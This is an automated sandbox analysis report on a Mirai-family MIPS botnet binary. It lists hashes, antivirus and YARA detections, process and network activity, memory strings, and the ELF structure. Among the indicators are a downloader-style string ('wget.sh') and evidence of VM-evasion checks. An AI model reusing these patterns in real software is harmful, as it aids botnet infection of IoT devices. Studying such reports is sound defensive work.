
Linux Analysis Report
meowmips.elf

Overview

General Information

Sample name: meowmips.elf
Analysis ID: 1650829
MD5: 0c893d7bd9411398fd1f1fb4f625cf0c
SHA1: b1829dbcc5aac316beaa75e85e49c555bc1c6143
SHA256: 445620c74ab4d7f8dc3bdee1a98076ca80381616e9067d6f64823c01cc8f3080
Tags: elf, user-abuse_ch
Infos:

Detection

Mirai
Score: 68
Range: 0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample reads /proc/mounts (often used for finding a writable filesystem)
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

[Classification chart. Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious.]
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1650829
Start date and time: 2025-03-28 04:33:23 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: meowmips.elf
Detection: MAL
Classification: mal68.troj.linELF@0/4@0/0
Command: /tmp/meowmips.elf
PID: 6236
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:
For God so loved the world
Standard Error:
  • system is lnxubuntu20
  • meowmips.elf (PID: 6236, Parent: 6159, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/meowmips.elf
  • dash New Fork (PID: 6241, Parent: 4331)
  • rm (PID: 6241, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.2AcxkoTNCi /tmp/tmp.zEzo0dTEWY /tmp/tmp.WezqumFwV9
  • dash New Fork (PID: 6242, Parent: 4331)
  • rm (PID: 6242, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.2AcxkoTNCi /tmp/tmp.zEzo0dTEWY /tmp/tmp.WezqumFwV9
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Mirai | Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Source | Rule | Description | Author | Strings
meowmips.elf | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |

Source | Rule | Description | Author | Strings
6263.1.00007f2b14400000.00007f2b1441d000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
6236.1.00007f2b14400000.00007f2b1441d000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |

No Suricata rule has matched

        AV Detection

        Source: meowmips.elf | Avira: detected
        Source: meowmips.elf | Virustotal: Detection: 31%
        Source: meowmips.elf | ReversingLabs: Detection: 36%
        Source: unknown | HTTPS traffic detected: 54.171.230.55:443 -> 192.168.2.23:33606 version: TLS 1.2
        Source: /tmp/meowmips.elf (PID: 6263) | Socket: 127.0.0.1:22448
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknown | TCP traffic detected without corresponding DNS query: 54.171.230.55
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknown | TCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: meowmips.elf, 6236.1.00007f2b1445e000.00007f2b14468000.rw-.sdmp, meowmips.elf, 6263.1.00007f2b1445e000.00007f2b14468000.rw-.sdmp | String found in binary or memory: http://0/t/wget.sh
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 33606
        Source: unknown | Network traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 33606 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 42836 -> 443
        Source: ELF static info symbol of initial sample | .symtab present: no
        Source: /tmp/meowmips.elf (PID: 6236) | SIGKILL sent: pid: 4430, result: successful
        Source: classification engine | Classification label: mal68.troj.linELF@0/4@0/0

        Persistence and Installation Behavior

        Source: /tmp/meowmips.elf (PID: 6236) | File: /proc/6236/mounts
        Source: /usr/bin/dash (PID: 6241) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.2AcxkoTNCi /tmp/tmp.zEzo0dTEWY /tmp/tmp.WezqumFwV9
        Source: /usr/bin/dash (PID: 6242) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.2AcxkoTNCi /tmp/tmp.zEzo0dTEWY /tmp/tmp.WezqumFwV9
        Source: /tmp/meowmips.elf (PID: 6236) | Queries kernel information via 'uname'
        Source: meowmips.elf, 6263.1.00007f2b1445e000.00007f2b14468000.rw-.sdmp | Binary or memory string: vmwarem
        Source: meowmips.elf, 6263.1.00007f2b1445e000.00007f2b14468000.rw-.sdmp | Binary or memory string: vmware
        Source: meowmips.elf, 6236.1.00007f2b1445e000.00007f2b14468000.rw-.sdmp, meowmips.elf, 6263.1.00007f2b1445e000.00007f2b14468000.rw-.sdmp | Binary or memory string: qemu-arm2QB
        Source: meowmips.elf, 6263.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmp | Binary or memory string: cUqemu: uncaught target signal 11 (Segmentation fault) - core dumped
        Source: meowmips.elf, 6236.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmp | Binary or memory string: cU/tmp/qemu-open.dOB3SI\
        Source: meowmips.elf, 6236.1.00007f2b1445e000.00007f2b14468000.rw-.sdmp, meowmips.elf, 6263.1.00007f2b1445e000.00007f2b14468000.rw-.sdmp | Binary or memory string: qemu-arm
        Source: meowmips.elf, 6236.1.00005563bfe71000.00005563bff39000.rw-.sdmp, meowmips.elf, 6263.1.00005563bfe71000.00005563bff39000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/mips
        Source: meowmips.elf, 6236.1.00005563bfe71000.00005563bff39000.rw-.sdmp, meowmips.elf, 6263.1.00005563bfe71000.00005563bff39000.rw-.sdmp | Binary or memory string: cU!/etc/qemu-binfmt/mips
        Source: meowmips.elf, 6236.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmp, meowmips.elf, 6263.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmp | Binary or memory string: <x86_64/usr/bin/qemu-mips/tmp/meowmips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/meowmips.elf
        Source: meowmips.elf, 6236.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmp | Binary or memory string: /tmp/qemu-open.dOB3SI
        Source: meowmips.elf, 6236.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmp, meowmips.elf, 6263.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-mips
        Source: meowmips.elf, 6263.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmp | Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

        Stealing of Sensitive Information

        Source: Yara match | File source: meowmips.elf, type: SAMPLE
        Source: Yara match | File source: 6263.1.00007f2b14400000.00007f2b1441d000.r-x.sdmp, type: MEMORY
        Source: Yara match | File source: 6236.1.00007f2b14400000.00007f2b1441d000.r-x.sdmp, type: MEMORY

        Remote Access Functionality

        Source: Yara match | File source: meowmips.elf, type: SAMPLE
        Source: Yara match | File source: 6263.1.00007f2b14400000.00007f2b1441d000.r-x.sdmp, type: MEMORY
        Source: Yara match | File source: 6236.1.00007f2b14400000.00007f2b1441d000.r-x.sdmp, type: MEMORY

        Reconnaissance: Gather Victim Identity Information; Credentials
        Resource Development: Acquire Infrastructure; Domains
        Initial Access: Valid Accounts; Default Accounts
        Execution: Windows Management Instrumentation; Scheduled Task/Job
        Persistence: Path Interception; Boot or Logon Initialization Scripts
        Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts
        Defense Evasion: 1 File Deletion; Rootkit
        Credential Access: 1 OS Credential Dumping; LSASS Memory
        Discovery: 11 Security Software Discovery; 1 File and Directory Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol
        Collection: Data from Local System; Data from Removable Media
        Command and Control: 1 Encrypted Channel; 1 Application Layer Protocol
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth
        Impact: Abuse Accessibility Features; Network Denial of Service
        No configs have been found
        [Behavior graph. ID: 1650829, Sample: meowmips.elf, Start date: 28/03/2025, Architecture: LINUX, Score: 68. Processes: meowmips.elf started and started a second meowmips.elf; two dash/rm processes started. Network: 109.202.202.202, port 80 (INIT7CH, Switzerland); 91.189.91.42, port 443 (CANONICAL-ASGB, United Kingdom); 2 other IPs or domains. Signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Mirai; Sample reads /proc/mounts (often used for finding a writable filesystem).]
        Source | Detection | Scanner | Label
        meowmips.elf | 31% | Virustotal |
        meowmips.elf | 36% | ReversingLabs | Linux.Backdoor.Gafgyt
        meowmips.elf | 100% | Avira | EXP/ELF.Agent.J.8

        No Antivirus matches

        No contacted domains info
        Name | Source | Malicious | Antivirus Detection | Reputation
        http://0/t/wget.sh | meowmips.elf, 6236.1.00007f2b1445e000.00007f2b14468000.rw-.sdmp, meowmips.elf, 6263.1.00007f2b1445e000.00007f2b14468000.rw-.sdmp | false | | high

        IP | Domain | Country | ASN | ASN Name | Malicious
        54.171.230.55 | unknown | United States | 16509 | AMAZON-02US | false
        109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false
        91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false
        91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false

        Match | Associated Sample Name / URL | Detection | Threat Name | Context
        54.171.230.55 | sync.mips.elf | malicious | Unknown |
        54.171.230.55 | na.elf | malicious | Prometei |
        54.171.230.55 | Okami.arm6.elf | malicious | Gafgyt, Mirai |
        54.171.230.55 | na.elf | malicious | Prometei |
        54.171.230.55 | na.elf | malicious | Prometei |
        54.171.230.55 | arm5.elf | malicious | Unknown |
        54.171.230.55 | na.elf | malicious | Prometei |
        54.171.230.55 | bin.sh.elf | malicious | Mirai |
        54.171.230.55 | na.elf | malicious | Prometei |
        54.171.230.55 | SecuriteInfo.com.FileRepMalware.2065.17794.elf | malicious | Unknown |
        109.202.202.202 | kpLwzBouH4.elf | malicious | Unknown | ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
        91.189.91.43 | sync.arm6.elf | malicious | Unknown |
        91.189.91.43 | aarch64.elf | malicious | Mirai |
        91.189.91.43 | sync.superh.elf | malicious | Unknown |
        91.189.91.43 | sync.arm5.elf | malicious | Unknown |
        91.189.91.43 | mpsl.elf | malicious | Unknown |
        91.189.91.43 | sync.x86.elf | malicious | Unknown |
        91.189.91.43 | sync.mipsel.elf | malicious | Unknown |
        91.189.91.43 | sync.arm4.elf | malicious | Unknown |
        91.189.91.43 | bin.sh.elf | malicious | Unknown |
        91.189.91.43 | na.elf | malicious | Prometei |
        91.189.91.42 | sync.arm6.elf | malicious | Unknown |
        91.189.91.42 | aarch64.elf | malicious | Mirai |
        91.189.91.42 | sync.superh.elf | malicious | Unknown |
        91.189.91.42 | sync.arm5.elf | malicious | Unknown |
        91.189.91.42 | mpsl.elf | malicious | Unknown |
        91.189.91.42 | sync.x86.elf | malicious | Unknown |
        91.189.91.42 | sync.mipsel.elf | malicious | Unknown |
        91.189.91.42 | sync.arm4.elf | malicious | Unknown |
        91.189.91.42 | bin.sh.elf | malicious | Unknown |
        91.189.91.42 | na.elf | malicious | Prometei |

        No context
                                                                      No context
                                                                      Process:/tmp/meowmips.elf
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):370
                                                                      Entropy (8bit):3.8672930224091293
                                                                      Encrypted:false
                                                                      SSDEEP:6:URINDFdfcz/VUB4DFdC4/VKAvVVyAb/3hM/V+4D/VH:IIt7DBw2baVIAbRMfF
                                                                      MD5:B3BAFE41962425E7E39FF20BF135E78A
                                                                      SHA1:25A74D808E61249BD4369BC20E95F00AF4E3E8D0
                                                                      SHA-256:8642E7A614673CAF5C861BFDADF6F266258972F9C10CAFA623151519031A9A35
                                                                      SHA-512:512ECAAE32FA700CD07F8A9827A884248624B56E4C9D66D56809AE2A824F0D974D776CF62A92F1E8C70C3E10116B877A4E35948248AFF9C5D5E4720B5AA4614F
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:
                                                                      400000-41d000 r-xp 00000000 fd:00 531606 /tmp/meowmips.elf
                                                                      45d000-45e000 rw-p 0001d000 fd:00 531606 /tmp/meowmips.elf
                                                                      45e000-468000 rw-p 00000000 00:00 0
                                                                      7f7fe000-7f7ff000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so
                                                                      7f7ff000-7f800000 ---p 00000000 00:00 0
                                                                      7f800000-80000000 rw-p 00000000 00:00 0 [stack]
                                                                      Process:/tmp/meowmips.elf
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):18
                                                                      Entropy (8bit):3.5724312513221195
                                                                      Encrypted:false
                                                                      SSDEEP:3:Tg58Cn:TgiC
                                                                      MD5:C3C3DB4878EEAA444050E77A2A00D47B
                                                                      SHA1:48DF97D85142A1C450B54CEBD0AC921276D8D60D
                                                                      SHA-256:408A43240150C29DD7EE18F6D5EF1414BC25DEC87E221B95D6EFE779AA4BE27A
                                                                      SHA-512:0C8CFC072DE8B2F755F180C6F85A8076E733D36ED59A5442135EEF91974364164A2B3FD53DFAC039FF2C9B2C26B3DDF5CA80461E2D4FC0D0C660507CD01CEBA8
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:/tmp/meowmips.elf.
                                                                      Process:/tmp/meowmips.elf
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):18
                                                                      Entropy (8bit):3.5724312513221195
                                                                      Encrypted:false
                                                                      SSDEEP:3:Tg58Cn:TgiC
                                                                      MD5:C3C3DB4878EEAA444050E77A2A00D47B
                                                                      SHA1:48DF97D85142A1C450B54CEBD0AC921276D8D60D
                                                                      SHA-256:408A43240150C29DD7EE18F6D5EF1414BC25DEC87E221B95D6EFE779AA4BE27A
                                                                      SHA-512:0C8CFC072DE8B2F755F180C6F85A8076E733D36ED59A5442135EEF91974364164A2B3FD53DFAC039FF2C9B2C26B3DDF5CA80461E2D4FC0D0C660507CD01CEBA8
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:/tmp/meowmips.elf.
                                                                      Process:/tmp/meowmips.elf
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):18
                                                                      Entropy (8bit):3.5724312513221195
                                                                      Encrypted:false
                                                                      SSDEEP:3:Tg58Cn:TgiC
                                                                      MD5:C3C3DB4878EEAA444050E77A2A00D47B
                                                                      SHA1:48DF97D85142A1C450B54CEBD0AC921276D8D60D
                                                                      SHA-256:408A43240150C29DD7EE18F6D5EF1414BC25DEC87E221B95D6EFE779AA4BE27A
                                                                      SHA-512:0C8CFC072DE8B2F755F180C6F85A8076E733D36ED59A5442135EEF91974364164A2B3FD53DFAC039FF2C9B2C26B3DDF5CA80461E2D4FC0D0C660507CD01CEBA8
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:/tmp/meowmips.elf.
                                                                      File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                                      Entropy (8bit):5.604283900850302
                                                                      TrID:
                                                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                      File name:meowmips.elf
                                                                      File size:122'200 bytes
                                                                      MD5:0c893d7bd9411398fd1f1fb4f625cf0c
                                                                      SHA1:b1829dbcc5aac316beaa75e85e49c555bc1c6143
                                                                      SHA256:445620c74ab4d7f8dc3bdee1a98076ca80381616e9067d6f64823c01cc8f3080
                                                                      SHA512:0be1e236898d7d5fc0c8867b4567367abc104b037da5d6ea1dc2bb432f7a24e7ca877dcb3f123925af86a4d9c0edd3c3a2a91f27c52cda3fb7241fc0645011e9
                                                                      SSDEEP:3072:73ZDhBdQilzIb5ZmSU8IlZPjlkdYfWppYwn39IZ5nqTE:jZDh3RNIbCNKzBN1A
                                                                      TLSH:69C3B50E2E358F6DF76DC33587B74A31A76863D626E0C689D26CF9151E2034D640FBA8
                                                                      File Content Preview:.ELF.....................@.`...4...P.....4. ...(.............@...@.....`...`.................E...E........nd........dt.Q............................<...'.T|...!'.......................<...'.TX...!... ....'9... ......................<...'.T(...!........'9.

                                                                      ELF header

                                                                      Class:ELF32
                                                                      Data:2's complement, big endian
                                                                      Version:1 (current)
                                                                      Machine:MIPS R3000
                                                                      Version Number:0x1
                                                                      Type:EXEC (Executable file)
                                                                      OS/ABI:UNIX - System V
                                                                      ABI Version:0
                                                                      Entry Point Address:0x400260
                                                                      Flags:0x1007
                                                                      ELF Header Size:52
                                                                      Program Header Offset:52
                                                                      Program Header Size:32
                                                                      Number of Program Headers:3
                                                                      Section Header Offset:121680
                                                                      Section Header Size:40
                                                                      Number of Section Headers:13
                                                                      Header String Table Index:12
                                                                      Name          Type      Address   Offset   Size     EntSize  Flags       Flags Description  Link  Info  Align
                                                                                    NULL      0x0       0x0      0x0      0x0      0x0                            0     0     0
                                                                      .init         PROGBITS  0x400094  0x94     0x8c     0x0      0x6         AX                 0     0     4
                                                                      .text         PROGBITS  0x400120  0x120    0x19b90  0x0      0x6         AX                 0     0     16
                                                                      .fini         PROGBITS  0x419cb0  0x19cb0  0x5c     0x0      0x6         AX                 0     0     4
                                                                      .rodata       PROGBITS  0x419d10  0x19d10  0x2d50   0x0      0x2         A                  0     0     16
                                                                      .ctors        PROGBITS  0x45d000  0x1d000  0x8      0x0      0x3         WA                 0     0     4
                                                                      .dtors        PROGBITS  0x45d008  0x1d008  0x8      0x0      0x3         WA                 0     0     4
                                                                      .data.rel.ro  PROGBITS  0x45d014  0x1d014  0xa8     0x0      0x3         WA                 0     0     4
                                                                      .data         PROGBITS  0x45d0c0  0x1d0c0  0x454    0x0      0x3         WA                 0     0     16
                                                                      .got          PROGBITS  0x45d520  0x1d520  0x5d8    0x4      0x10000003  WAp                0     0     16
                                                                      .sbss         NOBITS    0x45daf8  0x1daf8  0x1c     0x0      0x10000003  WAp                0     0     4
                                                                      .bss          NOBITS    0x45db20  0x1daf8  0x6344   0x0      0x3         WA                 0     0     16
                                                                      .shstrtab     STRTAB    0x0       0x1daf8  0x56     0x0      0x0                            0     0     1
                                                                      Type       Offset   Virtual Address  Physical Address  File Size  Memory Size  Entropy  Flags  Flags Description  Align    Prog Interpreter  Section Mappings
                                                                      LOAD       0x0      0x400000         0x400000          0x1ca60    0x1ca60      5.6643   0x5    R E                0x10000                    .init .text .fini .rodata
                                                                      LOAD       0x1d000  0x45d000         0x45d000          0xaf8      0x6e64       4.1211   0x6    RW                 0x10000                    .ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                                      GNU_STACK  0x0      0x0              0x0               0x0        0x0          0.0000   0x7    RWE                0x4


                                                                      • Total Packets: 14
                                                                      • 443 (HTTPS)
                                                                      • 80 (HTTP)
                                                                      Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                                                                      Mar 28, 2025 04:34:11.497333050 CET  43928        443        192.168.2.23   91.189.91.42
                                                                      Mar 28, 2025 04:34:13.755649090 CET  33606        443        192.168.2.23   54.171.230.55
                                                                      Mar 28, 2025 04:34:13.986612082 CET  443          33606      54.171.230.55  192.168.2.23
                                                                      Mar 28, 2025 04:34:13.986723900 CET  33606        443        192.168.2.23   54.171.230.55
                                                                      Mar 28, 2025 04:34:14.154723883 CET  443          33606      54.171.230.55  192.168.2.23
                                                                      Mar 28, 2025 04:34:15.108009100 CET  443          33606      54.171.230.55  192.168.2.23
                                                                      Mar 28, 2025 04:34:15.108040094 CET  443          33606      54.171.230.55  192.168.2.23
                                                                      Mar 28, 2025 04:34:15.108053923 CET  443          33606      54.171.230.55  192.168.2.23
                                                                      Mar 28, 2025 04:34:15.108067989 CET  443          33606      54.171.230.55  192.168.2.23
                                                                      Mar 28, 2025 04:34:15.108105898 CET  33606        443        192.168.2.23   54.171.230.55
                                                                      Mar 28, 2025 04:34:15.108175993 CET  33606        443        192.168.2.23   54.171.230.55
                                                                      Mar 28, 2025 04:34:15.108175993 CET  33606        443        192.168.2.23   54.171.230.55
                                                                      Mar 28, 2025 04:34:15.108175993 CET  33606        443        192.168.2.23   54.171.230.55
                                                                      Mar 28, 2025 04:34:16.872704029 CET  42836        443        192.168.2.23   91.189.91.43
                                                                      Mar 28, 2025 04:34:17.896528006 CET  42516        80         192.168.2.23   109.202.202.202
                                                                      Mar 28, 2025 04:34:32.742693901 CET  43928        443        192.168.2.23   91.189.91.42
                                                                      Mar 28, 2025 04:34:42.981587887 CET  42836        443        192.168.2.23   91.189.91.43
                                                                      Mar 28, 2025 04:34:49.124622107 CET  42516        80         192.168.2.23   109.202.202.202
                                                                      Mar 28, 2025 04:35:13.697365046 CET  43928        443        192.168.2.23   91.189.91.42
                                                                      Mar 28, 2025 04:35:34.174675941 CET  42836        443        192.168.2.23   91.189.91.43
                                                                      Timestamp:Mar 28, 2025 04:34:15.108053923 CET
                                                                      Source IP:54.171.230.55
                                                                      Source Port:443
                                                                      Dest IP:192.168.2.23
                                                                      Dest Port:33606
                                                                      Subject:CN=motd.ubuntu.com
                                                                      Issuer:CN=R10, O=Let's Encrypt, C=US
                                                                      Not Before:Sat Mar 22 09:18:05 CET 2025
                                                                      Not After:Fri Jun 20 10:18:04 CEST 2025
                                                                      Subject:CN=R10, O=Let's Encrypt, C=US
                                                                      Issuer:CN=ISRG Root X1, O=Internet Security Research Group, C=US
                                                                      Not Before:Wed Mar 13 01:00:00 CET 2024
                                                                      Not After:Sat Mar 13 00:59:59 CET 2027
                                                                      JA3 SSL Client Fingerprint:771,4866-4867-4865-49196-49200-163-159-52393-52392-52394-49327-49325-49315-49311-49245-49249-49239-49235-49195-49199-162-158-49326-49324-49314-49310-49244-49248-49238-49234-49188-49192-107-106-49267-49271-196-195-49187-49191-103-64-49266-49270-190-189-49162-49172-57-56-136-135-49161-49171-51-50-69-68-157-49313-49309-49233-156-49312-49308-49232-61-192-60-186-53-132-47-65-255,0-11-10-35-22-23-13-43-45-51,29-23-30-25-24,0-1-2
                                                                      JA3 SSL Client Digest:fb4726d465c5f28b84cd6d14cedd13a7

                                                                      System Behavior

                                                                      Start time (UTC):03:34:12
                                                                      Start date (UTC):28/03/2025
                                                                      Path:/tmp/meowmips.elf
                                                                      Arguments:-
                                                                      File size:5777432 bytes
                                                                      MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                      Start time (UTC):03:34:12
                                                                      Start date (UTC):28/03/2025
                                                                      Path:/usr/bin/dash
                                                                      Arguments:-
                                                                      File size:129816 bytes
                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                      Start time (UTC):03:34:12
                                                                      Start date (UTC):28/03/2025
                                                                      Path:/usr/bin/rm
                                                                      Arguments:rm -f /tmp/tmp.2AcxkoTNCi /tmp/tmp.zEzo0dTEWY /tmp/tmp.WezqumFwV9
                                                                      File size:72056 bytes
                                                                      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b
